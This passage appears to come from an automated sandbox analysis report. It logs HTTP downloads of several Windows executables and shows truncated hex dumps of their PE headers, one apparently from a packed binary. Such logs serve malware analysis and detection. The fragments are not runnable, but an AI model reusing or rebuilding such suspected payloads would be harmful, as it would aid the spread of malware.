00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Sep 2024 15:37:15 GMTContent-Type: application/octet-streamContent-Length: 1776640Last-Modified: Wed, 04 Sep 2024 13:30:25 GMTConnection: keep-aliveETag: "66d860f1-1b1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 70 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 67 00 00 04 00 00 bb fd 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6d 76 61 69 64 74 63 00 b0 19 00 00 b0 4d 00 00 a6 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 6d 79 62 79 79 6e 00 10 00 00 00 60 67 00 00 04 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 67 00 00 22 00 00 00 fa 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:16 GMTContent-Type: application/octet-streamContent-Length: 10902016Last-Modified: Thu, 22 Aug 2024 08:54:11 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66c6fcb3-a65a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 30 fc c6 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 6f 09 82 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 99 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 ef 81 01 3c 00 00 00 00 80 96 01 d0 04 03 00 40 53 96 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 81 01 28 00 00 00 00 52 96 01 38 01 00 00 00 00 00 00 00 00 00 00 00 20 f3 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 80 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 1f 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e8 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 c6 3a 28 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 20 f3 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 4d a3 00 00 30 f3 00 00 4e a3 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d0 04 03 00 00 80 96 01 00 06 03 00 00 54 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:18 GMTContent-Type: application/octet-streamContent-Length: 1760552Last-Modified: Mon, 02 Sep 2024 19:06:59 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d60cd3-1add28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 da 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 bd 87 1b 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 ea f1 04 00 00 00 00 00 00 00 00 00 20 8c 1a 00 08 51 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 ea f1 04 00 00 30 47 00 00 f2 04 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 30 4c 00 00 34 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
